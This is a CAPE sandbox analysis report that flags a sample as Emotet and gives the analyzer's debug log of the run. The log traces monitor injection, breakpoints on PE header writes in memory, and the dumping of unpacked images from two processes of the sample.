CAPE

Detections: Emotet

Analysis

Category  Package     Started              Completed            Duration
FILE      Extraction  2019-02-11 19:32:07  2019-02-11 19:35:57  230 seconds

Options:
route = internet
procdump = 1

Log:
2019-02-11 19:32:08,000 [root] INFO: Date set to: 02-11-19, time set to: 19:32:08, timeout set to: 200
2019-02-11 19:32:08,015 [root] DEBUG: Starting analyzer from: C:\eqetkxw
2019-02-11 19:32:08,015 [root] DEBUG: Storing results at: C:\qwuvvE
2019-02-11 19:32:08,015 [root] DEBUG: Pipe server name: \\.\PIPE\AGjwkpv
2019-02-11 19:32:08,015 [root] INFO: Analysis package "Extraction" has been specified.
2019-02-11 19:32:08,265 [root] DEBUG: Started auxiliary module Browser
2019-02-11 19:32:08,279 [root] DEBUG: Started auxiliary module Curtain
2019-02-11 19:32:08,279 [modules.auxiliary.digisig] INFO: Skipping authenticode validation, signtool.exe was not found in bin/
2019-02-11 19:32:08,279 [root] DEBUG: Started auxiliary module DigiSig
2019-02-11 19:32:08,279 [root] DEBUG: Started auxiliary module Disguise
2019-02-11 19:32:08,279 [root] DEBUG: Started auxiliary module Human
2019-02-11 19:32:08,279 [root] DEBUG: Started auxiliary module Screenshots
2019-02-11 19:32:08,279 [root] DEBUG: Started auxiliary module Sysmon
2019-02-11 19:32:08,279 [root] DEBUG: Started auxiliary module Usage
2019-02-11 19:32:08,279 [root] INFO: Analyzer: DLL set to Extraction.dll from package modules.packages.Extraction
2019-02-11 19:32:08,279 [root] INFO: Analyzer: Package modules.packages.Extraction does not specify a DLL_64 option
2019-02-11 19:32:08,451 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\sPVjc.exe" with arguments "" with pid 2932
2019-02-11 19:32:08,451 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-02-11 19:32:08,451 [lib.api.process] INFO: 32-bit DLL to inject is C:\eqetkxw\dll\eoxfAQ.dll, loader C:\eqetkxw\bin\coeISff.exe
2019-02-11 19:32:08,483 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2932
2019-02-11 19:32:10,496 [lib.api.process] INFO: Successfully resumed process with pid 2932
2019-02-11 19:32:10,496 [root] INFO: Added new process to list with pid: 2932
2019-02-11 19:32:10,573 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x7716124a, Wow64PrepareForException: 0x0
2019-02-11 19:32:10,573 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x130000
2019-02-11 19:32:10,573 [root] DEBUG: CAPE initialised (32-bit).
2019-02-11 19:32:10,667 [root] INFO: Monitor successfully loaded in process with pid 2932.
2019-02-11 19:32:10,683 [root] DEBUG: NtAllocateVirtualMemory hook, BaseAddress:0x140000, RegionSize: 0x1a000.
2019-02-11 19:32:10,683 [root] DEBUG: SetInitialWriteBreakpoint: AllocationBase: 0x140000, AllocationSize: 0x1a000, ThreadId: 0xb78
2019-02-11 19:32:10,683 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x2, Address=0x140000 and Type=0x1.
2019-02-11 19:32:10,683 [root] DEBUG: SetBreakpoint: Set bp 0 type 1 at address 0x140000, size 2 with Callback 0x74943100, ThreadHandle = 0xac.
2019-02-11 19:32:10,697 [root] DEBUG: SetInitialWriteBreakpoint: Breakpoint 0 set write on word at base address: 0x140000
2019-02-11 19:32:10,697 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,697 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x140000.
2019-02-11 19:32:10,697 [root] DEBUG: BaseAddressWriteCallback: M written to first byte, awaiting next byte.
2019-02-11 19:32:10,697 [root] DEBUG: BaseAddressWriteCallback executed successfully.
2019-02-11 19:32:10,697 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,697 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x140000.
2019-02-11 19:32:10,697 [root] DEBUG: BaseAddressWriteCallback: MZ header found.
2019-02-11 19:32:10,697 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 0 within Context, Size=0x4, Address=0x14003c and Type=0x1.
2019-02-11 19:32:10,697 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,697 [root] DEBUG: BaseAddressWriteCallback: set write bp on e_lfanew write location: 0x14003c (EIP = 0x12736e2)
2019-02-11 19:32:10,697 [root] DEBUG: BaseAddressWriteCallback executed successfully.
2019-02-11 19:32:10,697 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,697 [root] DEBUG: PEPointerWriteCallback entry.
2019-02-11 19:32:10,697 [root] DEBUG: PEPointerWriteCallback: Breakpoint 0 at Address 0x14003c.
2019-02-11 19:32:10,697 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 0 within Context, Size=0x4, Address=0x1400c8 and Type=0x1.
2019-02-11 19:32:10,697 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,697 [root] DEBUG: PEPointerWriteCallback: set write bp on e_lfanew write location 0x1400c8 (EIP = 0x12736e2)
2019-02-11 19:32:10,697 [root] DEBUG: PEPointerWriteCallback executed successfully.
2019-02-11 19:32:10,697 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,697 [root] DEBUG: PEHeaderWriteCallback: Breakpoint 0 at Address 0x1400c8.
2019-02-11 19:32:10,697 [root] DEBUG: PEHeaderWriteCallback: PE header has: 0x50.
2019-02-11 19:32:10,697 [root] DEBUG: PEHeaderWriteCallback executed successfully.
2019-02-11 19:32:10,713 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,713 [root] DEBUG: PEHeaderWriteCallback: Breakpoint 0 at Address 0x1400c8.
2019-02-11 19:32:10,713 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 0 within Context, Size=0x4, Address=0x1400f0 and Type=0x1.
2019-02-11 19:32:10,713 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,713 [root] DEBUG: PEHeaderWriteCallback: set write bp on AddressOfEntryPoint location (EIP = 0x12736e2).
2019-02-11 19:32:10,713 [root] DEBUG: PEHeaderWriteCallback executed successfully.
2019-02-11 19:32:10,713 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,713 [root] DEBUG: EntryPointWriteCallback: Breakpoint 0 at Address 0x1400f0.
2019-02-11 19:32:10,713 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 1 within Context, Size=0x0, Address=0x14007f and Type=0x0.
2019-02-11 19:32:10,713 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,713 [root] DEBUG: EntryPointWriteCallback: Execution bp 1 set on EntryPoint 0x14007f (EIP = 0x12736e2).
2019-02-11 19:32:10,713 [root] DEBUG: EntryPointWriteCallback executed successfully.
2019-02-11 19:32:10,713 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,713 [root] DEBUG: EntryPointWriteCallback: Breakpoint 0 at Address 0x1400f0.
2019-02-11 19:32:10,713 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 1 within Context, Size=0x0, Address=0x141f7f and Type=0x0.
2019-02-11 19:32:10,713 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,713 [root] DEBUG: EntryPointWriteCallback: Updated EntryPoint execution bp 1 to 0x141f7f (EIP = 0x12736e2).
2019-02-11 19:32:10,713 [root] DEBUG: EntryPointWriteCallback executed successfully.
2019-02-11 19:32:10,713 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,713 [root] DEBUG: EntryPointWriteCallback: Breakpoint 0 at Address 0x1400f0.
2019-02-11 19:32:10,713 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 1 within Context, Size=0x0, Address=0x141f7f and Type=0x0.
2019-02-11 19:32:10,713 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,713 [root] DEBUG: EntryPointWriteCallback: Updated EntryPoint execution bp 1 to 0x141f7f (EIP = 0x12736e2).
2019-02-11 19:32:10,713 [root] DEBUG: EntryPointWriteCallback executed successfully.
2019-02-11 19:32:10,713 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,713 [root] DEBUG: EntryPointWriteCallback: Breakpoint 0 at Address 0x1400f0.
2019-02-11 19:32:10,713 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 1 within Context, Size=0x0, Address=0x141f7f and Type=0x0.
2019-02-11 19:32:10,713 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,713 [root] DEBUG: EntryPointWriteCallback: Updated EntryPoint execution bp 1 to 0x141f7f (EIP = 0x12736e2).
2019-02-11 19:32:10,713 [root] DEBUG: EntryPointWriteCallback executed successfully.
2019-02-11 19:32:10,730 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x141f7f
2019-02-11 19:32:10,730 [root] DEBUG: EntryPointExecCallback: Breakpoint 1 at Address 0x141f7f.
2019-02-11 19:32:10,730 [root] DEBUG: DumpPEsInRange: Scanning range 0x140000 - 0x159000.
2019-02-11 19:32:10,730 [root] DEBUG: ScanForDisguisedPE: Characteristics bad.
2019-02-11 19:32:10,730 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x140000-0x159000.
2019-02-11 19:32:10,730 [root] DEBUG: EntryPointExecCallback: failed to dump PE module.
2019-02-11 19:32:10,730 [root] DEBUG: NtAllocateVirtualMemory hook, BaseAddress:0x270000, RegionSize: 0x10000.
2019-02-11 19:32:10,730 [root] DEBUG: NtAllocateVirtualMemory hook: attempting CAPE dump on previous region: 0x140000.
2019-02-11 19:32:10,730 [root] DEBUG: DumpPEsInRange: Scanning range 0x140000 - 0x15a000.
2019-02-11 19:32:10,730 [root] DEBUG: ScanForDisguisedPE: Characteristics bad.
2019-02-11 19:32:10,730 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x140000-0x15a000.
2019-02-11 19:32:10,730 [root] DEBUG: NtAllocateVirtualMemory hook: dumping memory range at 0x140000.
2019-02-11 19:32:10,730 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\eqetkxw\CAPE\2932_73010122311122019
2019-02-11 19:32:10,730 [root] INFO: Added new CAPE file to list with path: C:\eqetkxw\CAPE\2932_73010122311122019
2019-02-11 19:32:10,730 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x140000 - 0x15a000.
2019-02-11 19:32:10,730 [root] DEBUG: SetInitialWriteBreakpoint: AllocationBase: 0x270000, AllocationSize: 0x10000, ThreadId: 0xb78
2019-02-11 19:32:10,730 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x2, Address=0x270000 and Type=0x1.
2019-02-11 19:32:10,730 [root] DEBUG: SetBreakpoint: Set bp 0 type 1 at address 0x270000, size 2 with Callback 0x74943100, ThreadHandle = 0xac.
2019-02-11 19:32:10,730 [root] DEBUG: SetInitialWriteBreakpoint: Breakpoint 0 set write on word at base address: 0x270000
2019-02-11 19:32:10,730 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x14177b
2019-02-11 19:32:10,730 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x270000.
2019-02-11 19:32:10,730 [root] DEBUG: BaseAddressWriteCallback: byte written to 0x270000: 0x0.
2019-02-11 19:32:10,730 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 1 within Context, Size=0x0, Address=0x270000 and Type=0x0.
2019-02-11 19:32:10,730 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,744 [root] DEBUG: BaseAddressWriteCallback: Execution breakpoint 1 set base address: 0x270000, AllocationBaseExecBpSet = 1 (EIP = 0x14177b)
2019-02-11 19:32:10,744 [root] DEBUG: BaseAddressWriteCallback executed successfully.
2019-02-11 19:32:10,744 [root] DEBUG: ProtectionHandler: Address: 0x211000, RegionSize: 0xf744
2019-02-11 19:32:10,744 [root] DEBUG: ProtectionHandler: attempting CAPE dump on region: 0x270000.
2019-02-11 19:32:10,744 [root] DEBUG: DumpPEsInRange: Scanning range 0x210000 - 0x220000.
2019-02-11 19:32:10,744 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x210000
2019-02-11 19:32:10,744 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-02-11 19:32:10,744 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x210000
2019-02-11 19:32:10,744 [root] DEBUG: DumpProcess: Module entry point VA is 0x21f5e0
2019-02-11 19:32:10,744 [root] INFO: Added new CAPE file to list with path: C:\eqetkxw\CAPE\2932_74510122311122019
2019-02-11 19:32:10,744 [root] DEBUG: DumpProcess: Module image dump success
2019-02-11 19:32:10,744 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x210000.
2019-02-11 19:32:10,744 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x210001-0x220000.
2019-02-11 19:32:10,744 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-02-11 19:32:10,744 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x270000 - 0x280000.
2019-02-11 19:32:10,744 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x270000.
2019-02-11 19:32:10,744 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 1 address 0x270000.
2019-02-11 19:32:10,744 [root] DEBUG: DumpPEsInRange: Scanning range 0x210000 - 0x220000.
2019-02-11 19:32:10,744 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x210000
2019-02-11 19:32:10,744 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-02-11 19:32:10,744 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x210000
2019-02-11 19:32:10,744 [root] DEBUG: DumpProcess: Module entry point VA is 0x21f5e0
2019-02-11 19:32:10,760 [root] INFO: Added new CAPE file to list with path: C:\eqetkxw\CAPE\2932_76110122311122019
2019-02-11 19:32:10,760 [root] DEBUG: DumpProcess: Module image dump success
2019-02-11 19:32:10,760 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x210000.
2019-02-11 19:32:10,760 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x210001-0x220000.
2019-02-11 19:32:10,760 [root] DEBUG: ProtectionHandler: Found and dumped PE image(s).
2019-02-11 19:32:10,760 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x211000 and Type=0x0.
2019-02-11 19:32:10,760 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x211000, size 0 with Callback 0x74942e90, ThreadHandle = 0xac.
2019-02-11 19:32:10,760 [root] DEBUG: ProtectionHandler: Execution breakpoint 0 set base address: 0x211000, AllocationBaseExecBpSet = 1
2019-02-11 19:32:10,760 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x211000
2019-02-11 19:32:10,760 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x211000.
2019-02-11 19:32:10,760 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x210000, size 0x10744).
2019-02-11 19:32:10,760 [root] DEBUG: DumpPEsInRange: Scanning range 0x210000 - 0x220744.
2019-02-11 19:32:10,760 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x210000
2019-02-11 19:32:10,760 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-02-11 19:32:10,760 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x210000
2019-02-11 19:32:10,760 [root] DEBUG: DumpProcess: Module entry point VA is 0x21f5e0
2019-02-11 19:32:10,760 [root] DEBUG: savePeFileToDisk: Name clash, trying to obtain new name...
2019-02-11 19:32:10,776 [root] DEBUG: Error 183 (0xb7) - savePeFileToDisk: Failed twice to rename file: Cannot create a file when that file already exists.
2019-02-11 19:32:10,776 [root] DEBUG: Error 183 (0xb7) - DumpProcess: Error - Cannot dump image: Cannot create a file when that file already exists.
2019-02-11 19:32:10,776 [root] DEBUG: DumpImageInCurrentProcess: Failed to dump PE as virtual image.
2019-02-11 19:32:10,776 [root] DEBUG: DumpPEsInRange: Failed to dump PE image from 0x210000.
2019-02-11 19:32:10,776 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x210001-0x220744.
2019-02-11 19:32:10,776 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\eqetkxw\CAPE\2932_77610122311122019
2019-02-11 19:32:10,776 [root] INFO: Added new CAPE file to list with path: C:\eqetkxw\CAPE\2932_77610122311122019
2019-02-11 19:32:10,776 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x211000 - 0x220744.
2019-02-11 19:32:10,776 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x211000.
2019-02-11 19:32:10,776 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x210000.
2019-02-11 19:32:10,776 [root] DEBUG: MidPageExecCallback executed successfully.
2019-02-11 19:32:10,808 [root] INFO: Announced 32-bit process name: sPVjc.exe pid: 2832
2019-02-11 19:32:10,808 [root] INFO: Added new process to list with pid: 2832
2019-02-11 19:32:10,808 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-02-11 19:32:10,808 [lib.api.process] INFO: 32-bit DLL to inject is C:\eqetkxw\dll\eoxfAQ.dll, loader C:\eqetkxw\bin\coeISff.exe
2019-02-11 19:32:10,808 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2832
2019-02-11 19:32:10,808 [root] INFO: Disabling sleep skipping.
2019-02-11 19:32:10,808 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x7716124a, Wow64PrepareForException: 0x0
2019-02-11 19:32:10,808 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x1e0000
2019-02-11 19:32:10,808 [root] DEBUG: CAPE initialised (32-bit).
2019-02-11 19:32:10,808 [root] INFO: Disabling sleep skipping.
2019-02-11 19:32:10,822 [root] INFO: Monitor successfully loaded in process with pid 2832.
2019-02-11 19:32:10,822 [root] DEBUG: NtAllocateVirtualMemory hook, BaseAddress:0x270000, RegionSize: 0x1a000.
2019-02-11 19:32:10,822 [root] DEBUG: SetInitialWriteBreakpoint: AllocationBase: 0x270000, AllocationSize: 0x1a000, ThreadId: 0xb70
2019-02-11 19:32:10,822 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x2, Address=0x270000 and Type=0x1.
2019-02-11 19:32:10,822 [root] DEBUG: SetBreakpoint: Set bp 0 type 1 at address 0x270000, size 2 with Callback 0x74943100, ThreadHandle = 0xac.
2019-02-11 19:32:10,822 [root] DEBUG: SetInitialWriteBreakpoint: Breakpoint 0 set write on word at base address: 0x270000
2019-02-11 19:32:10,822 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,822 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x270000.
2019-02-11 19:32:10,822 [root] DEBUG: BaseAddressWriteCallback: M written to first byte, awaiting next byte.
2019-02-11 19:32:10,822 [root] DEBUG: BaseAddressWriteCallback executed successfully.
2019-02-11 19:32:10,822 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,822 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x270000.
2019-02-11 19:32:10,822 [root] DEBUG: BaseAddressWriteCallback: MZ header found.
2019-02-11 19:32:10,822 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 0 within Context, Size=0x4, Address=0x27003c and Type=0x1.
2019-02-11 19:32:10,822 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,822 [root] DEBUG: BaseAddressWriteCallback: set write bp on e_lfanew write location: 0x27003c (EIP = 0x12736e2)
2019-02-11 19:32:10,822 [root] DEBUG: BaseAddressWriteCallback executed successfully.
2019-02-11 19:32:10,822 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,822 [root] DEBUG: PEPointerWriteCallback entry.
2019-02-11 19:32:10,822 [root] DEBUG: PEPointerWriteCallback: Breakpoint 0 at Address 0x27003c.
2019-02-11 19:32:10,822 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 0 within Context, Size=0x4, Address=0x2700c8 and Type=0x1.
2019-02-11 19:32:10,822 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,822 [root] DEBUG: PEPointerWriteCallback: set write bp on e_lfanew write location 0x2700c8 (EIP = 0x12736e2)
2019-02-11 19:32:10,822 [root] DEBUG: PEPointerWriteCallback executed successfully.
2019-02-11 19:32:10,822 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,822 [root] DEBUG: PEHeaderWriteCallback: Breakpoint 0 at Address 0x2700c8.
2019-02-11 19:32:10,822 [root] DEBUG: PEHeaderWriteCallback: PE header has: 0x50.
2019-02-11 19:32:10,822 [root] DEBUG: PEHeaderWriteCallback executed successfully.
2019-02-11 19:32:10,822 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,822 [root] DEBUG: PEHeaderWriteCallback: Breakpoint 0 at Address 0x2700c8.
2019-02-11 19:32:10,822 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 0 within Context, Size=0x4, Address=0x2700f0 and Type=0x1.
2019-02-11 19:32:10,822 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,822 [root] DEBUG: PEHeaderWriteCallback: set write bp on AddressOfEntryPoint location (EIP = 0x12736e2).
2019-02-11 19:32:10,838 [root] DEBUG: PEHeaderWriteCallback executed successfully.
2019-02-11 19:32:10,838 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,838 [root] DEBUG: EntryPointWriteCallback: Breakpoint 0 at Address 0x2700f0.
2019-02-11 19:32:10,838 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 1 within Context, Size=0x0, Address=0x27007f and Type=0x0.
2019-02-11 19:32:10,838 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,838 [root] DEBUG: EntryPointWriteCallback: Execution bp 1 set on EntryPoint 0x27007f (EIP = 0x12736e2).
2019-02-11 19:32:10,838 [root] DEBUG: EntryPointWriteCallback executed successfully.
2019-02-11 19:32:10,838 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,838 [root] DEBUG: EntryPointWriteCallback: Breakpoint 0 at Address 0x2700f0.
2019-02-11 19:32:10,838 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 1 within Context, Size=0x0, Address=0x271f7f and Type=0x0.
2019-02-11 19:32:10,838 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,838 [root] DEBUG: EntryPointWriteCallback: Updated EntryPoint execution bp 1 to 0x271f7f (EIP = 0x12736e2).
2019-02-11 19:32:10,838 [root] DEBUG: EntryPointWriteCallback executed successfully.
2019-02-11 19:32:10,838 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,838 [root] DEBUG: EntryPointWriteCallback: Breakpoint 0 at Address 0x2700f0.
2019-02-11 19:32:10,838 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 1 within Context, Size=0x0, Address=0x271f7f and Type=0x0.
2019-02-11 19:32:10,838 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,838 [root] DEBUG: EntryPointWriteCallback: Updated EntryPoint execution bp 1 to 0x271f7f (EIP = 0x12736e2).
2019-02-11 19:32:10,838 [root] DEBUG: EntryPointWriteCallback executed successfully.
2019-02-11 19:32:10,838 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,838 [root] DEBUG: EntryPointWriteCallback: Breakpoint 0 at Address 0x2700f0.
2019-02-11 19:32:10,838 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 1 within Context, Size=0x0, Address=0x271f7f and Type=0x0.
2019-02-11 19:32:10,838 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,838 [root] DEBUG: EntryPointWriteCallback: Updated EntryPoint execution bp 1 to 0x271f7f (EIP = 0x12736e2).
2019-02-11 19:32:10,838 [root] DEBUG: EntryPointWriteCallback executed successfully.
2019-02-11 19:32:10,838 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x271f7f
2019-02-11 19:32:10,838 [root] DEBUG: EntryPointExecCallback: Breakpoint 1 at Address 0x271f7f.
2019-02-11 19:32:10,838 [root] DEBUG: DumpPEsInRange: Scanning range 0x270000 - 0x289000.
2019-02-11 19:32:10,838 [root] DEBUG: ScanForDisguisedPE: Characteristics bad.
2019-02-11 19:32:10,838 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x270000-0x289000.
2019-02-11 19:32:10,838 [root] DEBUG: EntryPointExecCallback: failed to dump PE module.
2019-02-11 19:32:10,838 [root] DEBUG: NtAllocateVirtualMemory hook, BaseAddress:0x220000, RegionSize: 0x10000.
2019-02-11 19:32:10,838 [root] DEBUG: NtAllocateVirtualMemory hook: attempting CAPE dump on previous region: 0x270000.
2019-02-11 19:32:10,838 [root] DEBUG: DumpPEsInRange: Scanning range 0x270000 - 0x28a000.
2019-02-11 19:32:10,854 [root] DEBUG: ScanForDisguisedPE: Characteristics bad.
2019-02-11 19:32:10,854 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x270000-0x28a000.
2019-02-11 19:32:10,854 [root] DEBUG: NtAllocateVirtualMemory hook: dumping memory range at 0x270000.
2019-02-11 19:32:10,854 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\eqetkxw\CAPE\2832_85410122311122019
2019-02-11 19:32:10,854 [root] INFO: Added new CAPE file to list with path: C:\eqetkxw\CAPE\2832_85410122311122019
2019-02-11 19:32:10,854 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x270000 - 0x28a000.
2019-02-11 19:32:10,854 [root] DEBUG: SetInitialWriteBreakpoint: AllocationBase: 0x220000, AllocationSize: 0x10000, ThreadId: 0xb70
2019-02-11 19:32:10,854 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x2, Address=0x220000 and Type=0x1.
2019-02-11 19:32:10,854 [root] DEBUG: SetBreakpoint: Set bp 0 type 1 at address 0x220000, size 2 with Callback 0x74943100, ThreadHandle = 0xac.
2019-02-11 19:32:10,854 [root] DEBUG: SetInitialWriteBreakpoint: Breakpoint 0 set write on word at base address: 0x220000
2019-02-11 19:32:10,854 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x27177b
2019-02-11 19:32:10,854 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x220000.
2019-02-11 19:32:10,854 [root] DEBUG: BaseAddressWriteCallback: byte written to 0x220000: 0x0.
2019-02-11 19:32:10,854 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 1 within Context, Size=0x0, Address=0x220000 and Type=0x0.
2019-02-11 19:32:10,854 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,854 [root] DEBUG: BaseAddressWriteCallback: Execution breakpoint 1 set base address: 0x220000, AllocationBaseExecBpSet = 1 (EIP = 0x27177b)
2019-02-11 19:32:10,854 [root] DEBUG: BaseAddressWriteCallback executed successfully.
2019-02-11 19:32:10,854 [root] DEBUG: ProtectionHandler: Address: 0x291000, RegionSize: 0xf744
2019-02-11 19:32:10,854 [root] DEBUG: ProtectionHandler: attempting CAPE dump on region: 0x220000.
2019-02-11 19:32:10,854 [root] DEBUG: DumpPEsInRange: Scanning range 0x290000 - 0x2a0000.
2019-02-11 19:32:10,854 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x290000
2019-02-11 19:32:10,854 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-02-11 19:32:10,854 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x290000
2019-02-11 19:32:10,854 [root] DEBUG: DumpProcess: Module entry point VA is 0x29f5e0
2019-02-11 19:32:10,869 [root] INFO: Added new CAPE file to list with path: C:\eqetkxw\CAPE\2832_87010122311122019
2019-02-11 19:32:10,869 [root] DEBUG: DumpProcess: Module image dump success
2019-02-11 19:32:10,869 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x290000.
2019-02-11 19:32:10,869 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x290001-0x2a0000.
2019-02-11 19:32:10,869 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
